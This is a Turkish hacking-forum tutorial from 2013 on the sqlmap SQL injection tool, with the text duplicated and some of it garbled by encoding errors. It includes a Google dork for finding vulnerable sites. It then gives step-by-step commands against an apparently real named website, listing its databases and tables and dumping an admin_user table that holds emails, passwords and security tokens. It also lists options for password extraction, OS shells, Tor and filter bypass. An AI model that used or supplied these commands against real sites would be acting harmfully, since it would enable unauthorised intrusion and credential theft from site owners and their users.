- 5 Ocak 2013
- 1,558
- 3
Merhabalar ben Xelarmen. Önceki açtığım konuda (Diğer Konu)JSQL Aracını tanıtmıştık. Bugünki aracımızın ismi SQLMAP. Kali linux kullananların çok iyi bileceği bir araçtır. Birçok veritabanına uygun çalışma şekilleri ve Bypass yöntemleri vardır. A
Sizi çok sıkmadan programa geçiyorum...>>
Program bir GUİ (Grafiksel Kullanıcı Arayüzü)'ye sahip değil. Ucbirim diğer bir adıyla terminal üzerinden adını yazarak çalıştırıyoruz..
Resimdeki gibi:
Şekilde gördüğünüz gibi programın adını yazdığımız an bizi sqlmap'in ascii art ile yazılmış logosu karşılıyor ve bu bizim bilgisayarımızda SQLMAP programının yüklü olduğunu gösteriyor.
Eğer ki bilgisayarınızda SQLMAP yüklü değilse.....>>
UYGULAMANIN LİNKİ
Yukarıdaki siteden uygulamayı indirin ve zipten çıkartın. Tavsiyem her zamanki gibi çalışma ortamınız yani uygulamanın bulunduğu dizinin temiz olmasından yana. Zipten çıkardıktan sonra programın bulunduğu dizinde şu komutu verin
Programadı yazan yere indirdiğiniz dosyanın adını yazıyorsunuz.
Programın Komutları.....>>
Programın komutlarını diğer bir deyişle parametrelerini
Komutlarını kullanarak öğrenebilirsiniz. Ben konunun sonuna birçok parametrenin Türkçe karşılığını ekleyeceğim
Sıra geldi öğrenmemiz gereken birkaç ayrıntıya..>>
Biz ilk etapta veritabanlarını(database) leri sıralatacağız. Ardıntan tabloları(tables) en son olarak ise sütunları(columns) ları çekeceğiz. Bu sıralama bizim çok işimize yarayacak.
Sql açıklı bir site üzerinde tarama nasıl yapacağım?..>>
Programın taslağı alttaki komuttur arkadaşlar:
Bu komutu verdiğimiz andan itibaren programımız hedef sitedeki veritabanlarını araştıracaktır.
Şekildeki gibi:
Siteyi bir önceki konudaki siteyle aynısı olarak seçmemin sebebi görsel arayüz ile ucbirim arasındaki benzerlikleri görmenizdir.
İki adet veritabanı bulundu. Sıra bu veritabanlarının içindeki tabloları çekme zamanı
Komutumuz:
Tablolarımız şekildeki gibi karşımıza geliyor:
Evet tablolar karşımıza geldi ve sütunları çekeceğiz şimdide.
Hedefimiz admin_user sütunu
Yukardaki kodu yazdıktan sonra aşağıdaki gibi sütunlar karşımıza gelecektir:
Evet sırada ise işin en güzel tarafına geldik. Verileri çekme zamanı. Aşağıdaki komut ile bütün verileri çekeceğim. Siz -C den sonra gelen içerikleri değiştirebilirsiniz.
Yukarıdaki kod gözünüzü korkutmasın. Sadece istediğimiz sütun isimlerini yazdık ve aralarına birer virgül ve en son olarak --dump koyduk. Şimdi ise gelsin bakalım veriler :RpS_tongue:.
Excel tablosu halinde otomatik olarak home dizininin içindeki .sqlmap klasörünün içerisine kaydediyor. Eğer ki klasöre göremiyorsanız ctrl+h kısayolunu kullanarak gizli klösörleri görünür hale getirebilirsiniz.
PROGRAMIN PARAMETRELERİ..>>
-h, --help// Yardım Menüsünü açar
-hh// Gelişmiş Yardım Menüsünü Açar
--version// Versiyon öğrenme
-v VERBOSE// Gösterim şekli level:06 (varsayılan 1)
-u URL, --url=URL// Hedef URL
-g GOOGLEDORK// Google dork araması yapar ve URL listesini listeler
--data=DATA// Post işlerinde data belirtmek için kullanılır
--cookie=COOKİE// Cookie belirtmek için kullanılır
--random-agent// Rastgele HTTP User-Agent başlık bilgisi kullanmak için kullanılır
--proxy=PROXY// Rastgele proxy kullanmak için kullanılır
--tor// Tor Network ile tarama sağlar
--check-tor// Tor doğruluk testi için kullanılır
--level=LEVEL// Test seviyesi belirtme (1-5, varsayılan 1)
--risk=RISK// Risk seviyesi belirtme (1-5, varsayılan 1)
--technique=TECH// SQL Injection teknikleri belirtme (varsayılan ââââ¬Å¡¬Åââ¬ÅBEUSTQââââ¬Å¡¬)
-a, --all// Veri çekmek için kullanılır
-b, --banner// Database banner gösterir
--current-user// Database içindeki kullanıcılları listeler
--current-db// Genel databaseyi gösterir
--passwords// Databasedeki şifreleri çeker
--tables// Databasedeki tabloları listeler
--columns// Database içerisindeki tabloların kolonlarını listeler
--schema// Databaseleri listeler
--dump// Databasedeki tablo girdilerini çeker
--dump-all// Databasedeki bütün tablo girdilerini çeker
-D DB// Database belirtmek için kullanılır
-T TBL// Tablo belirtmek için kullanılır
-C COL// Kolon belirtmek için kullanılır
--os-shell// Shell oturumu başlatır
--tamper// Bypass script kullanmak için kullanılır
Bundan sonrası sizin hayalgücünüze bağlı arkadaşlar.
Videolu anlatım en yakın zamanda konuya eklenecektir. Ayrıca programın bütün özellikleri konuda anlattığımla kısıtlı değil. Daha birçok özelliği var. Bu anlattıklarım sadece başlangıç seviyede.
İyi forumlar diliyorum....
Sizi çok sıkmadan programa geçiyorum...>>
Program bir GUİ (Grafiksel Kullanıcı Arayüzü)'ye sahip değil. Ucbirim diğer bir adıyla terminal üzerinden adını yazarak çalıştırıyoruz..
Resimdeki gibi:
Şekilde gördüğünüz gibi programın adını yazdığımız an bizi sqlmap'in ascii art ile yazılmış logosu karşılıyor ve bu bizim bilgisayarımızda SQLMAP programının yüklü olduğunu gösteriyor.
Eğer ki bilgisayarınızda SQLMAP yüklü değilse.....>>
UYGULAMANIN LİNKİ
Yukarıdaki siteden uygulamayı indirin ve zipten çıkartın. Tavsiyem her zamanki gibi çalışma ortamınız yani uygulamanın bulunduğu dizinin temiz olmasından yana. Zipten çıkardıktan sonra programın bulunduğu dizinde şu komutu verin
Kod:
python programadı.pyProgramın Komutları.....>>
Programın komutlarını diğer bir deyişle parametrelerini
Kod:
sqlmap -h
Kod:
sqlmap --helpSıra geldi öğrenmemiz gereken birkaç ayrıntıya..>>
Biz ilk etapta veritabanlarını(database) leri sıralatacağız. Ardıntan tabloları(tables) en son olarak ise sütunları(columns) ları çekeceğiz. Bu sıralama bizim çok işimize yarayacak.
Sql açıklı bir site üzerinde tarama nasıl yapacağım?..>>
Programın taslağı alttaki komuttur arkadaşlar:
Kod:
sqlmap -u"www.aciklisite.com/
Kod:
[COLOR=White][SIZE=3][FONT=Franklin Gothic Medium]allinurl:news.php?id=" --dbs [/FONT][/SIZE][/COLOR]Bu komutu verdiğimiz andan itibaren programımız hedef sitedeki veritabanlarını araştıracaktır.
Şekildeki gibi:
Siteyi bir önceki konudaki siteyle aynısı olarak seçmemin sebebi görsel arayüz ile ucbirim arasındaki benzerlikleri görmenizdir.
İki adet veritabanı bulundu. Sıra bu veritabanlarının içindeki tabloları çekme zamanı
Komutumuz:
Kod:
[COLOR=White][SIZE=3][FONT=Franklin Gothic Medium]sqlmap -u "http://www.tunesoman.com/product.php?id=200" -D db363851433 --tables
[/FONT][/SIZE][/COLOR]Tablolarımız şekildeki gibi karşımıza geliyor:
Evet tablolar karşımıza geldi ve sütunları çekeceğiz şimdide.
Hedefimiz admin_user sütunu
Kod:
sqlmap -u "http://www.tunesoman.com/product.php?id=200" -D db363851433 -T admin_user --columnsEvet sırada ise işin en güzel tarafına geldik. Verileri çekme zamanı. Aşağıdaki komut ile bütün verileri çekeceğim. Siz -C den sonra gelen içerikleri değiştirebilirsiniz.
Kod:
sqlmap -u "http://www.tunesoman.com/product.php?id=200" -D db363851433 -T admin_user -C admin_email,admin_first_name,admin_last_name,admin_level,admin_pass,admin_status,admin_user_name,created,id,last_login,login_attempt_failed,modified,module_access,security_token --dumpExcel tablosu halinde otomatik olarak home dizininin içindeki .sqlmap klasörünün içerisine kaydediyor. Eğer ki klasöre göremiyorsanız ctrl+h kısayolunu kullanarak gizli klösörleri görünür hale getirebilirsiniz.
PROGRAMIN PARAMETRELERİ..>>
-h, --help// Yardım Menüsünü açar
-hh// Gelişmiş Yardım Menüsünü Açar
--version// Versiyon öğrenme
-v VERBOSE// Gösterim şekli level:06 (varsayılan 1)
-u URL, --url=URL// Hedef URL
-g GOOGLEDORK// Google dork araması yapar ve URL listesini listeler
--data=DATA// Post işlerinde data belirtmek için kullanılır
--cookie=COOKİE// Cookie belirtmek için kullanılır
--random-agent// Rastgele HTTP User-Agent başlık bilgisi kullanmak için kullanılır
--proxy=PROXY// Rastgele proxy kullanmak için kullanılır
--tor// Tor Network ile tarama sağlar
--check-tor// Tor doğruluk testi için kullanılır
--level=LEVEL// Test seviyesi belirtme (1-5, varsayılan 1)
--risk=RISK// Risk seviyesi belirtme (1-5, varsayılan 1)
--technique=TECH// SQL Injection teknikleri belirtme (varsayılan ââââ¬Å¡¬Åââ¬ÅBEUSTQââââ¬Å¡¬)
-a, --all// Veri çekmek için kullanılır
-b, --banner// Database banner gösterir
--current-user// Database içindeki kullanıcılları listeler
--current-db// Genel databaseyi gösterir
--passwords// Databasedeki şifreleri çeker
--tables// Databasedeki tabloları listeler
--columns// Database içerisindeki tabloların kolonlarını listeler
--schema// Databaseleri listeler
--dump// Databasedeki tablo girdilerini çeker
--dump-all// Databasedeki bütün tablo girdilerini çeker
-D DB// Database belirtmek için kullanılır
-T TBL// Tablo belirtmek için kullanılır
-C COL// Kolon belirtmek için kullanılır
--os-shell// Shell oturumu başlatır
--tamper// Bypass script kullanmak için kullanılır
Bundan sonrası sizin hayalgücünüze bağlı arkadaşlar.
Videolu anlatım en yakın zamanda konuya eklenecektir. Ayrıca programın bütün özellikleri konuda anlattığımla kısıtlı değil. Daha birçok özelliği var. Bu anlattıklarım sadece başlangıç seviyede.
İyi forumlar diliyorum....
Son düzenleme:
